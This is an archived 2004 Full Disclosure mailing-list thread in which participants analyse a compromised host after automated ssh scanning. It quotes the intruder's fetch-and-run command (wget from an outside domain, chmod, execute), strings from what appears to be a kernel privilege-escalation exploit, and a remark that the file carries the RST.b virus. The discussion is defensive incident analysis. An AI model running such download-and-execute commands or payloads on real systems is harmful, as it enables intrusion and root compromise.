Full Disclosure mailing list archives
Re: Betr.: RE: Automated ssh scanning
From: "VeNoMouS" <venom () gen-x co nz>
Date: Fri, 27 Aug 2004 13:22:02 +1200
LOL that file is infected with rst.b and you ran it?? hope it was inside a chroot() other wise time to replace every elf binary >:)
----- Original Message ----- From: "Blue Boar" <BlueBoar () thievco com>
To: "Todd Towles" <toddtowles () brookshires com>Cc: "Pascal Zoutendijk" <Pascal.Zoutendijk () tbwa nl>; "Mailing List - Full-Disclosure" <full-disclosure () lists netsys com>
Sent: Friday, August 27, 2004 9:12 AM Subject: Re: Betr.: RE: [Full-disclosure] Automated ssh scanning
Todd Towles wrote:It could be, but he said it was patched. I didn't run the test ofcourse. I never said it was the kernel however, it could be a service running.And unknown does not equal zero-day. But the tool got root and he doesn't know how. That is the point. Kernel, old service, whatever. It would be nice to find it.If you take a look at this bit: wget www.bo2k-rulez.net/a chmod +x a ./aThe file "a" gives every superficial indication that it's a kernel exploit, if you want to go by a 20-second Notepad analysis:[-] Unable to exit, entering neverending loop. Kernel seems not to be vulnerable double allocationUnable to determine kernel address Unable to set up LDT Unable to change page protection Invalid LDT entry Unable to jump to call gate /bin/sh Unable to spawn shell PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate memory Unable to unmap stack Unable to expand BSS /proc/sys/kernel/osrelease FATAL: kernel too oldFATAL: cannot determine library version/dev/null ;’;’(’„’Œ’ malloc: using debugging hooksrealloc(): invalid pointer %p! malloc: top chunk is corrupt Arena %d: system bytes = %10u in use bytes = %10u Total (incl. mmap): max mmap regions = %10u max mmap bytes = %10lu free(): invalid pointer %p! TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_ BB _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Betr.: RE: Automated ssh scanning Todd Towles (Aug 26)
- Re: Betr.: RE: Automated ssh scanning Blue Boar (Aug 26)
- Re: Betr.: RE: Automated ssh scanning VeNoMouS (Aug 26)
- Re: Betr.: RE: Automated ssh scanning Blue Boar (Aug 26)
- Re: Betr.: RE: Automated ssh scanning Henrik Persson (Aug 27)
- Re: Betr.: RE: Automated ssh scanning Henrik Persson (Aug 27)
- Re: Betr.: RE: Automated ssh scanning Andrew Farmer (Aug 27)
- Re: Betr.: RE: Automated ssh scanning Christian (Aug 27)
- Re: Betr.: RE: Automated ssh scanning VeNoMouS (Aug 26)
- Re: Betr.: RE: Automated ssh scanning Blue Boar (Aug 26)